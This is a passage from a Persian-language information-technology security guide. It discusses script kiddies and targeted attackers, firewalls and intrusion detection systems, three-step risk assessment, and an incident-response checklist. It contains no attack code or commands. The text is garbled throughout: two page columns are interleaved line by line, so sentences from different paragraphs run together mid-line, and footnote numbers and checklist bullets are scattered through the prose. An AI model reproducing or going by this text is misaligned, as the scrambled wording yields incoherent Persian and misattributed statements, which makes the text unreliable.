ﻋﻠﺖ ﺁﻥ ﻋﺪﻡ ﺣﻔﺎﻇﺖ ﺻﺤﻴﺢ ﺍﺯ ﺳﻴﺴﺘﻢ ﺑﻪ ﻋﻠﺖ ﺁﻣﻮﺯﺵ ﻓﻨﻲ ﻧﻤﻲﺷﻮﻧﺪ ﺍﻣﺎ ﺗﻌﺪﺍﺩ ﺁﻧﻬﺎ ﺯﻳﺎﺩ ﺍﺳﺖ ﻭ ﮔﺎﻫﻲ ﺑﻪ ﺻﻮﺭﺕ ﺗﻴﻤﻲ ﻛﺎﺭ
ﻧﺎﻗﺺ ﻳﺎ ﺑﻲﺩﻗﺘﻲ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎﺷﺪ. ﻣﻲﻛﻨﻨﺪ ﻭ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺍﻳﻦ ﻗﺎﻟـﺐ ﺗﻬﺪﻳـﺪ ﺑﺰﺭﮔﺘـﺮﻱ ﺑـﻪ ﺣـﺴﺎﺏ
ﻫﺮﻳــﻚ ﺍﺯ ﺍﻳــﻦ ﺗﻬﺪﻳــﺪﺍﺕ ﺑــﺎﻟﻘﻮﺓ ﺍﻧــﺴﺎﻧﻲ ﺑــﺮﺍﻱ ﺳﻴــﺴﺘﻤﻬﺎ ﻭ ﻣﻲﺁﻳﻨﺪ"Script Kiddie" .ﻫﺎ ﻧﻔﻮﺫ ﻣﻮﻓﻖ ﺧـﻮﺩ ﺭﺍ ﻣﻨﺘـﺸﺮ ﻭ ﺍﺯ
ﺍﻃﻼﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺳﻄﺢ ﻣﺘﻔﺎﻭﺗﻲ ﺍﺯ ﻣﺨﺎﻃﺮﻩ ﺭﺍ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧﺪ ﻭ ﻲ
ﺁﻥ ﻃﺮﻳﻖ ﺍﺩﻋﺎﻱ ﺷﻬﺮﺕ ﻣﻲﻛﻨﻨـﺪ .ﺩﺭ ﻭﺍﻗـﻊ ﺁﻧﻬـﺎ ﺑـﻪ ﺑـﺪﻧﺎﻣ ﹺ
ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﻧﻴـﺎﺯ ﺍﺳـﺖ. ﺣﺎﺻﻞ ﺍﺯ ﺣﺠﻢ ﺯﻳﺎﺩ ﺣﻤﻼﺕ ﺧﻮﺩ ﺍﻓﺘﺨﺎﺭ ﻣـﻲﻛﻨﻨـﺪ .ﺑـﻪ ﻋﻠـﺖ
ﺑﺨﺶ ﺳﻮﻡ
ﺶ ﺑﻪﺭﻭﺯ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗ ﹺ ﺭﻭﺍﺝ ﺍﻳﻦ ﺗﻬﺪﻳﺪ ،ﺳـﺎﺯﻧﺪﮔﺎﻥ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺍﺑﺰﺍﺭﻫـﺎﻱ
ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨـﻲ ﻳـﺎ ""script kiddieﻫـﺎ ﻣﺆﺛﺮﻱ ﺭﺍ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳـﻦ ﻧـﻮﻉ ﻧﻔـﻮﺫ ﺗﻬﻴـﻪ ﻛـﺮﺩﻩﺍﻧـﺪ.
ﻛﻔﺎﻳﺖ ﻛﻨﻨﺪ .ﺍﻣـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﻫﺪﻓـﺪﺍﺭ ،ﺍﻳـﻦ ﺭﺍﻫﺒـﺮﺍﻥ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳـﺎﺏ ٦١ﺑـﺮﺍﻱ ﺩﻓـﺎﻉ ﺩﺭ
ﻫﻮﺷﻴﺎﺭ ﺳﻴﺴﺘﻢ ﻭ ﻣﺪﻳﺮﺍﻥ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﻣﻘﺎﺑﻞ ﭼﻨﻴﻦ ﺣﻤﻼﺗﻲ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ.
ﻣﺘﻮﻗﻒ ﺳﺎﺯﻧﺪ؛ ﻭ ﺩﺭ ﺍﻳﻦ ﺭﺍﺳﺘﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﻻ ﻣﻬﺎﺟﻤﺎﻥ ﺧﺒـﺮﻩﺍﻱ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺗﺒﻬﻜﺎﺭﺍﻥ ﻫﺪﻓﺪﺍﺭ ﻣﻌﻤﻮ ﹰ
ﺗﻮﺟﻪ ﻣﺪﻳﺮﻳﺖ ﺑﻪ ﺧﻨﺜﻲﺳﺎﺯﻱ ﺣﻤﻼﺕ ﺍﺣﺘﻤﺎﻟﻲ ﺩﺭﻭﻥﺳـﺎﺯﻣﺎﻧﻲ ﻫﺪﻑ ﺁﻧﻬﺎ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ،ﺗﺨﺮﻳﺐ ﻭ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩﻥ ﺩﺍﺩﻩﻫـﺎ ،ﻭ
ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺍﻣﺎ ﻫﻴﭻ ﻃﺮﺣﻲ ﺑﺪﻭﻥ ﻧﻘﺺ ﻧﻴـﺴﺖ ﻭ ﺑـﺴﻴﺎﺭ ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﺧﻼﻝ ﻳﻚ ﺑﺎﺯﺓ ﺯﻣـﺎﻧﻲ ﻣـﻲﺑﺎﺷـﺪ.
ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ،ﺳﺎﺑﻘﻪ ﻭ ﺭﻭﻧﺪ ﺍﻳﻦ ﻃﺮﺣﻬﺎ ﺭﺍ ﺑﺎ ﺗﻮﺟـﻪ ﺑﺮﺧﻼﻑ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨﻲ ﻭ ""script kiddieﻫﺎ ،ﻫـﺪﻑ ﺁﻧﻬـﺎ
ﺑﻪ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺴﺘﻤﺮﹰﺍ ﺑﺮﺭﺳﻲ ﻛﻨـﺪ .ﻧﻈـﺎﺭﺕ ﻣـﺴﺘﻤﺮ ﺑـﺮ ﻭﺍﻗﻌﹰﺎ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎ ﺍﺳـﺖ .ﺁﻧﻬـﺎ ﺩﺭ ﺑﺮﺧـﻲ ﻣـﻮﺍﺭﺩ ﺑـﺪﻧﺒﺎﻝ
ﺩﻭﺭﻧﻤــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ،ﻛــﺸﻒ ﻭ ﺟﻠــﻮﮔﻴﺮﻱ ﺍﺯ ﻧﻔــﻮﺫ ﺭﺍ ﺳــﺎﺩﻩﺗــﺮ ﺍﻃﻼﻋﺎﺕ ﺍﺭﺯﺷﻤﻨﺪﻱ ﻣﺜـﻞ ﺩﺍﺩﻩﻫـﺎﻱ ﻣـﺎﻟﻲ )ﺷـﻤﺎﺭﻩﻫـﺎﻱ ﻛـﺎﺭﺕ
ﻣﻲﻧﻤﺎﻳﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ،ﺍﺗﺨﺎﺫ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺷﻔﺎﻑ ﺩﺭﺑـﺎﺭﺓ ﺁﻧﭽـﻪ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﺟﺰﺋﻴﺎﺕ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ( ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ )ﺷـﻤﺎﺭﻩﻫـﺎﻱ
ﻛﻪ ﺑﺎﻳﺪ ﺣﻴﻦ ﻭ ﺑﻌﺪ ﺍﺯ ﻭﻗﻮﻉ ﺣﻤﻠﻪ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ﺑﻪ ﻛﺎﻫﺶ ﺁﺳﻴﺐ ﺷﻨﺎﺳﺎﻳﻲ ،ﺳﻮﺍﺑﻖ ﺩﺍﻧﺸﮕﺎﻫﻲ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﻣـﺸﺘﺮﻳﺎﻥ( ﻫـﺴﺘﻨﺪ ﺗـﺎ ﺁﻧﻬـﺎ ﺭﺍ
ﻛﻤﻚ ﻣﻲﻛﻨﺪ ،ﺍﻓـﺮﺍﺩ ﻣـﺴﺌﻮﻝ ﺭﺍ ﺑـﺮﺍﻱ ﺭﺳـﻴﺪﮔﻲ ﺑـﻪ ﺧﺮﺍﺑـﻲ ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ ﻳﺎ ﺑﮕﻮﻧﻪﺍﻱ ﺩﻳﮕﺮ ﺍﺯ ﺁﻧﻬﺎ ﺑﻬﺮﻩ ﺑﺒﺮﻧﺪ .ﺍﻳـﻦ ﺩﺳـﺘﻪ ﺍﺯ
ﺭﺍﻫﻨﻤﺎﻳﻲ ﻣﻲﻧﻤﺎﻳﺪ ﻭ ﺍﻣﻜﺎﻥ ﺛﺒﺖ ﻣﻨﺎﺳﺐ ﮔﺰﺍﺭﺷﺎﺕ ﻻﺯﻡ ﺑـﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﻏﺎﻟﺒﹰﺎ ﺑﺨﻮﺑﻲ ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﻣﻲﺷﻮﻧﺪ ﻭ ﭘـﻴﺶ ﺍﺯ ﺍﻧﺠـﺎﻡ
ﻣﻘﺎﻣﺎﺕ ﺩﺍﺧﻞ ﻭ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﺩ. ﺣﻤﻠﺔ ﺍﺻﻠﻲ ،ﺍﻃﻼﻋﺎﺕ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺭﺍﺟـﻊ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﻗﺮﺑـﺎﻧﻲ
ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﻛﻨﻨﺪ .ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺗﻌﺪﺍﺩ ﺍﻳﻦ ﻧﻮﻉ ﻣﺠﺮﻣﺎﻥ ﻛﻤﺘـﺮ
ﺗﺨﻤﻴﻦ ﻋﻤﻠﻲ ﺍﻣﻨﻴﺖ: ﺍﺯ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺍﺳﺖ ،ﺍﻣﺎ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻧﻔﻮﺫ ﺁﻧـﺎﻥ ﺑـﺴﻴﺎﺭ ﻣـﺸﻜﻞ
ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ ﻣﻲﺑﺎﺷﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﻧﻔﻮﺫ ﻣﻮﻓﻘﻴﺖﺁﻣﻴـﺰ ،ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺎﻋـﺚ
ﺗﺨﺮﻳﺒﻬﺎﻱ ﺟﺪﻱ ﺷﻮﻧﺪ.
ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﺗﺨﻠﻔﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺭﻳﺸﻪ ﺩﺭ ﺣﻤﻼﺕ
ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ ﺩﺍﺭﻧﺪ ﻭ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﻣﺸﺎﻭﺭﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﻋﻤﺪﻱ ﻭ ﻳـﺎ ﺳـﻬﻮﻱ
ﺩﺍﺩﻩﻫﺎ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻭ ﻏﻴﺮﺍﺧﻼﻗﻲ ﻣﻨﺘﻬﻲ ﻣﻲﺷـﻮﻧﺪ. ﺗﻬﺪﻳﺪﺍﺕ ﺟﺪﻱ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺍﻳﺠﺎﺩ ﻛﻨﻨـﺪ ﻭ ﺍﻳـﻦ ﺑـﺴﺘﮕﻲ ﺑـﻪ
ﮔﺎﻣﻬﺎﻱ ﺍﺑﺘﺪﺍﻳﻲ ﺍﻳﺠﺎﺩ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺯﻣﺎﻧﻲ ﺑﺮﺩﺍﺷﺘﻪ ﻣﻲﺷـﻮﺩ ﻣﺎﻫﻴﺖ ﺭﻭﺍﺑﻂ ﺁﻧﻬﺎ ﺑﺎ ﻣـﺪﻳﺮﺍﻥ ﻭ ﻫﻤﻜﺎﺭﺍﻧـﺸﺎﻥ ﺩﺭ ﻣﺤـﻴﻂ ﻛـﺎﺭ
ﻛﻪ ﺳﺎﺯﻣﺎﻥ ،ﻳﻚ ﺗﺨﻤﻴﻦ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻣﻮﺭﺩ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﺩﺍﺧﻠـﻲ،
ﺍﻫﺪﺍﻑ ،ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳـﻦ
61 )Intrusion Detection Systems (IDSs
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٤٠
ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻳﺎﻥ؛ o ﻋﻨﺎﺻﺮ ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴـﻞ ﺷـﺪﻧﺪ ،ﻳـﻚ ﺳﻴﺎﺳـﺖ ﺍﻣﻨﻴﺘـﻲ ﻭ ﻧﻴـﺰ
ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺣﻤﻠﻪ؛ o ﻃﺮﺣﻲ ﺑﺮﺍﻱ ﺭﻭﺍﻟﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻌﻪ ﻳﺎﺑﺪ.
ﺍﻋﻼﻡ ﺣﻤﻠﻪ ﺑﻪ ﻣﺪﻳﺮﺕ ﺍﺭﺷﺪ؛ o
ﺍﻳﻦ ﻃﺮﺡ ﺑﺎﻳﺪ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑﺎﺭﺓ ﺣﻮﺯﻩﻫﺎﻱ ﻛﻠﻴﺪﻱ ﺫﻳـﻞ
ﺛﺒﺖ ﻭﻗﺎﻳﻊ؛ o
٦٤
ﺑﺎﺷﺪ:
ﺗﻬﻴﺔ ﺗﺼﺎﻭﻳﺮ ﺁﻧﻲ ﺍﺯ ﺳﻴﺴﺘﻢ؛ o
ﺗﻤﺎﺱ ﺑﺎ ﺗﻴﻢ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ o ﺩﺍﻧﺴﺘﻦ ﺯﻣﺎﻧﻲ ﻛﻪ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻭﺍﻗﻊ ﻣﻲﺷﻮﻳﺪ -ﺍﺯ ﻃﺮﻳﻖ •
ﻣﺮﺍﺣﻞ ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ oﺁﻳﺎ ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﻣﻄﻠﻊ ﻛﺮﺩﻥ ﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ
)ﺩﺭﺻﻮﺭﺕ ﻭﺟﻮﺩ( ﺍﺯ ﻭﻗﻮﻉ ﺣﻮﺍﺩﺙ ﺍﺣﺘﻤـﺎﻟﻲ ﺗﻌﺮﻳـﻒ
ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺍﻳﻦ
ﺷﺪﻩ ﺍﺳﺖ؟
ﺳﺌﻮﺍﻻﺕ ﺍﺳﺎﺳﻲ ﺍﺳﺖ:
oﺁﻳﺎ ﺭﻭﺍﻟﻲ ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﺯﻣﺎﻥ ﺗﻤﺎﺱ ﺑﺎ ﺍﻓﺮﺍﺩ ﺧﺎﺭﺟﻲ
.۱ﺳﻌﻲ ﺩﺭ ﺣﻔﻆ ﭼﻪ ﭼﻴﺰﻱ ﺩﺍﺭﻡ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻘـﺪﺭ ﺑـﺮﺍﻱ ﺑﺮﺍﻱ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤـﻚ ﻭ ﻓـﺮﺩﻱ ﻛـﻪ ﺑﺎﻳـﺪ ﺍﻳـﻦ
ﻣﻦ ﺍﺭﺯﺵ ﺩﺍﺭﺩ؟ ﺗﻤﺎﺱ ﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
.۲ﺩﺭ ﻣﻘﺎﺑﻞ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﻧﻴﺎﺯ ﺑﻪ ﺣﻔﺎﻇﺖ ﺩﺍﺭﻡ؟
.۳ﺣﺎﺿــﺮﻡ ﭼﻘــﺪﺭ ﺯﻣــﺎﻥ ،ﺗــﻼﺵ ﻭ ﺳــﺮﻣﺎﻳﻪ ﺑــﺮﺍﻱ ﺗــﺄﻣﻴﻦ ﺭﻭﺍﻟﻬﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ:
ﺣﻔﺎﻇﺖ ﻣﻨﺎﺳﺐ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻢ؟ ﺁﻳﺎ ﻫﻤﺔ ﻛﺎﺭﻛﻨﺎﻥ ﻛﻠﻴﺪﻱ ﺑﺮﺍﻱ ﺑﻜﺎﺭ ﺑﺴﺘﻦ ﺭﻭﺍﻟﻬـﺎ o
٦٧ ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻧﺪ؟
ﺱ ﻓﺮﺁﻳﻨـﺪﻱ ﺑـﻪ ﻧـﺎﻡ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﺭﺍ
ﺍﻳﻦ ﺳﺆﺍﻻﺕ ،ﺍﺳﺎ ﹺ
ﺷﻜﻞ ﻣﻲﺩﻫﻨﺪ .ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺑﺨﺶ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﺍﺯ ﻓﺮﺁﻳﻨـﺪ ﺁﻳــﺎ ﻛﺎﺭﻛﻨــﺎﻥ ﻛﻠﻴــﺪﻱ ﻭﺍﻗﻌ ـﹰﺎ ﺩﺭ ﻫﻤــﺔ ﺟﻠــﺴﺎﺕ o
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ .ﺍﮔﺮ ﺷﻤﺎ ﻧﺪﺍﻧﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﭼﻪ ﻭ ﺩﺭ ﻣﻘﺎﺑﻞ ﭼﻪ ﺁﻣﻮﺯﺷﻲ ﺣﻀﻮﺭ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ؟
ﭼﻴﺰﻱ ﺣﻔﺎﻇﺖ ﺭﺍ ﺍﻋﻤﺎﻝ ﻣﻲﻛﻨﻴﺪ ،ﻧﺨﻮﺍﻫﻴﺪ ﺗﻮﺍﻧـﺴﺖ ﮔﺎﻣﻬـﺎﻱ ﺁﻳــﺎ ﺩﻟﻴــﻞ ﺍﻧﺘﺨــﺎﺏ ﻛﺎﺭﻛﻨــﺎﻥ ﻛﻠﻴــﺪﻱ ،ﺳــﻮﺍﺑﻖ o
ﺁﻧﺮﺍ ﺗـﺪﻭﻳﻦ ﻧﻤﺎﻳﻴـﺪ .ﻭﻗﺘـﻲ ﺧﻄـﺮﺍﺕ ﺭﺍ ﺷـﻨﺎﺧﺘﻴﺪ ،ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺭﺧﺸﺎﻥ ﺁﻧﻬﺎ ﺑﻮﺩﻩ ﺍﺳﺖ؟
ﺑﺨﺶ ﺳﻮﻡ
ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻓﻨﻮﻧﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﻃﺮﺣﻬﺎﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﻩ ﺁﻳﺎ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻭ ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ o
ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺭﺍ ﻃﺮﺍﺣﻲ ﻛﻨﻴﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔـﺮ ﺧﻄـﺮ ﻗﻄـﻊ ﺑـﺮﻕ ﺭﻭﺍﻥ ﺍﺳﺖ؟
ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻬﻢ ﺍﺳﺖ ،ﺑﺎﻳﺪ ﺍﻳﻦ ﺧﻄﺮ ﺭﺍ ﺑـﺎ
ﺭﻭﺍﻟﻬﺎﻱ ﻣﻨﺎﺑﻊ ﻓﻨﻲ:
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ٦٨UPSﻛﺎﻫﺶ ﺩﻫﻴﺪ.
ﺁﻳﺎ ﺩﺳﺘﻮﺭﺍﺗﻲ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﻛﺮﺩﻥ ﻳﺎ ﭘﺎﻳـﺎﻥ ﺩﺍﺩﻥ ﺑـﻪ o
ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺷﺎﻣﻞ ﺳﻪ ﻣﺮﺣﻠﺔ ﻛﻠﻴﺪﻱ ﺍﺳﺖ:
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﻴﺴﺘﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
ﺷﻨﺎﺳﺎﻳﻲ ﺩﺍﺭﺍﺋﻴﻬﺎ ﻭ ﺍﺭﺯﺵ ﺁﻧﻬﺎ .۱ ﺁﻳﺎ ﺩﺳﺘﻮﺭﺍﺕ ﺁﻏﺎﺯ ﻳﺎ ﭘﺎﻳﺎﻥ ﻃﺮﺡ ﺑـﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ o
ﺷﻨﺎﺳﺎﻳﻲ ﺗﻬﺪﻳﺪﺍﺕ .۲ ﺑﺮﺭﺳﻲ ﻣﻲﺷﻮﻧﺪ؟
ﻣﺤﺎﺳﺒﺔ ﻣﺨﺎﻃﺮﺍﺕ .۳ ﺁﻳﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﻛـﺸﻒ ﺗﻬـﺎﺟﻢ ﺭﻭﻱ o
ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ .ﻳـﻚ ﺳﻴﺴﺘﻢ ﻧﺼﺐ ﻭ ﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ؟
ﺭﻭﺵ ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﺑـﺴﻴﺎﺭ ﻣﻮﻓـﻖ ﺑـﻮﺩﻩ ،ﺍﻳﺠـﺎﺩ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺁﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﻨﺎﺳﺎﻳﻲ ٦٦ﻛﻪ ﺭﻭﻱ ﺷﺒﻜﻪ ﻧﺼﺐ ﺷﺪﻩ o
ﻲ ﺩﺭﻭﻥﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ .ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﺷـﻤﺎ ﻛﺎﺭﮔﺎﻫﻬﺎﻱ ﺁﻣﻮﺯﺷ ﹺ ﻣﻲﺗﻮﺍﻧﺪ ﺣﻤﻼﺕ ﻧﺎﺷﻨﺎﺧﺘﻪ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ؟
ﺑﺎﻳــﺪ ﺍﺯ ﻛــﺎﺭﺑﺮﺍﻥ ﺁﮔــﺎﻩ ﺑﺨــﺸﻬﺎﻱ ﻣﺨﺘﻠــﻒ ،ﻣــﺪﻳﺮﺍﻥ ﻣﻴــﺎﻧﻲ ﻭ ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﺎﺧﺘﺎﺭ ﻻﻳﻪﺑﻨـﺪﻱﺷـﺪﻩ o
ﻣﺪﻳﺮﺍﻥ ﺍﺟﺮﺍﻳـﻲ ﺳـﺎﺯﻣﺎﻥ ﺧـﻮﺩ ﺩﻋـﻮﺕ ﺑﻌﻤـﻞ ﺁﻭﺭﻳـﺪ؛ ﻭ ﻃـﻲ ﺣﻤﻼﺗﻲ ﻛﻪ ﺑـﻪ ﺷـﺒﻜﻪ ﻣـﻲﺷـﻮﻧﺪ ﺭﺍ ﻛـﺸﻒ ﻭ ﺍﺯ
ﺟﻠﺴﺎﺗﻲ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍ ﺗﻬﻴـﻪ ﻧﻤﺎﻳﻴـﺪ .ﺍﻳـﻦ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻴﺪ؟
ﻓﺮﺁﻳﻨﺪ ﻧﻪﺗﻨﻬﺎ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻛﻪ ﻓﻬﺮﺳﺖ ﻛﺎﻣﻠﺘﺮﻱ ﺗﻬﻴﻪ ﺁﻳــﺎ ﺭﻭﻱ ﺷــﺒﻜﻪ ﻣــﻲﺗــﻮﺍﻥ ﺣﻤــﻼﺕ ﺭﺍ ﺑــﺴﺎﺩﮔﻲ o
ﻛﻨﻴﺪ ،ﺑﻠﻜﻪ ﺁﮔﺎﻫﻲ ﺣﻀﺎﺭ ﺍﺯ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻧﻴﺰ ﺑﺎﻻﺗﺮ ﻣﻲﺑﺮﺩ. ﺗﻌﻘﻴﺐ ﻛﺮﺩ؟
ﻲ ﺍﻣﻨﻴــﺖ ،ﻛﻠﻴــﺔ
ﻱ ﺭﺳــﻤ ﹺﺁﻳــﺎ ﺑــﺮ ﺍﺳــﺎﺱ ﻣﻤﻴــﺰ ﹺ o
